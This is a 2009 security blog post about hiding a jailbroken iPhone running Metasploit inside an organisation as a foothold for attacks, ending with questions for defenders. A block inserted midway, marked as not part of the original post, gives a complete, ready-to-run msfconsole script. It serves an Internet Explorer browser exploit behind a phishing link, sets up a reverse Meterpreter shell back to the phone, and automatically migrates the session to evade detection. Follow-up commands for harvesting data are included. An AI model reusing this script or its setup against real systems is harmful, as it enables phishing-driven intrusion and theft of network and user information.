Of iPhones and Wifi
Posted: August 18th, 2009 | Author: Matt | Filed under: Brain Dump, InfoSec | Tags: endpoint, InfoSec, iphone, Late Night Rambling
Alternative Title: If I “rm -fr /” my iPhone, does Steve Jobs kill a kitten?
Setup.
So I haven’t had a chance to really get “hands on” with this simply because I have zero free time at the moment, so bear with me on this one.
We all know at least one annoying person with an Apple iPhone, right? I know, I am that annoying person with an iPhone. They really have changed the game entirely, not only as mobile handsets but as small mobile computers that can be placed inside an environment and used as a device to pivot from, or to maintain a foothold on, that network.
Next.
Right, we have our iPhone (or I guess even your iPod touch, but I haven’t played with one of those), and it has wireless. It has a nifty little power cable (or at least mine does) that’s pretty small and can be used to power the device from under a desk, in a random closet somewhere nearby, or in that cable tray with a stray power outlet. What does that mean to you and me? Right now? Not much. But jailbreak the phone, stick on OpenSSH (or simply enable it, in my case) and hey... what’s that? Metasploit?? No... surely not. Yes, ladies and gentlemen, you now have Metasploit installed and running from your iPhone. Think about that for a second. Let it really sink in.
Next.
So are you with me so far? We have a very small device with fairly decent WiFi capability that can stay powered on until it’s found or the attacker decides to come back and pick it up. What can an attacker do with this? Well, they could start any one (or many) of Metasploit’s built-in browser exploit modules as a web server on the phone and just wait. The attacker then spams a link to that server to anyone within the target business (anyone for a spot of spear whaling?) and will no doubt get at least one machine on the network compromised. How is this useful to the attacker?
1. We have a remote shell on a compromised machine within the target network.
2. We could now use Meterpreter to maintain access and harvest as much information on that network as is physically possible. Believe me, this is a scary amount of information.
3. With that compromised host and the information gleaned from it, we can now deepen the foothold we have on the organization.
Next.
All of this is very scary. I’ve been experimenting with Metasploit and Meterpreter and I can say that it’s trivial to exploit the older versions of Internet Explorer. That’s one thing, but add to this the post-exploitation bliss that is Meterpreter and you have a very nasty combination. The WinEnum script by Darkoperator pulls in so much useful information from the victim machine that it becomes even more trivial to start building very comprehensive maps and other useful information on the target network. And the ringer? Meterpreter runs completely from memory; nothing is written to disk, so file-scanning anti-virus isn’t going to detect it either. Fine, I will see the broken IE process and kill it! Wrong: simply migrate Meterpreter from IE into something a little less suspect with the migrate script. Beige coloured mold could do this stuff....
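As an added example (not from the original post), here is what the chain above looks like when written down as an msfconsole resource script and loaded on the phone with `msfconsole -r`. Everything concrete in it is an assumption made for the example: the phone’s WLAN address (192.168.1.50), the ports, the URI path that goes into the phishing mail, and the choice of browser module (Metasploit’s MS06-013 createTextRange exploit for IE 6), which stands in for “any one of the built-in browser exploits”.

```msf
# Added example: msfconsole resource script run on the jailbroken iPhone.
# Assumed values (not from the post): phone WLAN address 192.168.1.50,
# web server on 8080, Meterpreter callback on 4444, an IE 6 target and
# the MS06-013 createTextRange module as the stand-in browser exploit.

use exploit/windows/browser/ms06_013_createtextrange

# Serve the exploit page from the phone's WLAN interface.
set SRVHOST 192.168.1.50
set SRVPORT 8080
# This path is what the phishing link points at: http://192.168.1.50:8080/hr-survey
set URIPATH /hr-survey

# Staged Meterpreter that calls back to the phone; nothing is written to disk.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444

# Keep serving after the first victim so every click yields a session.
set ExitOnSession false

# As soon as a session opens, leave the crashed IE process:
# migrate -f spawns a fresh process and moves Meterpreter into it,
# so killing the broken iexplore.exe no longer ends the session.
set AutoRunScript migrate -f

# Run the web server and handler as a background job and wait.
exploit -j
```

Once a victim has clicked, `sessions -i 1` attaches to the first session and `run winenum` collects the host, user, network and domain information the post refers to; because the migrate autorun has already run, the session survives the user closing the crashed browser window.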
Done.
Yes, we’re done. We have an extremely portable device that can be used to gain a foothold in a target network and then not only maintain but extend that foothold. What does this mean to security professionals? It means the attack surface is growing and generally there isn’t anything we can do about it. Why? Have you ever tried to tell your C-level exec to switch off the WiFi on his handset? You’re going to have another vector to worry about, and it’s going to be the biggest worry of them all.
To sum it all up, endpoint security is tough. Very tough. But hopefully this post will do one thing (and hopefully it’s not make me look like an insane ranting person), and that’s get the thought processes going on what we can do. What policies and procedures can we implement to at least mitigate these issues? Can we separate these devices off into their own networks? Is this even viable in your environment?
Unfortunately I don’t have any of the answers for this. I probably only have more questions, but to me, that’s what this is about: asking the right questions to at least get to the answers.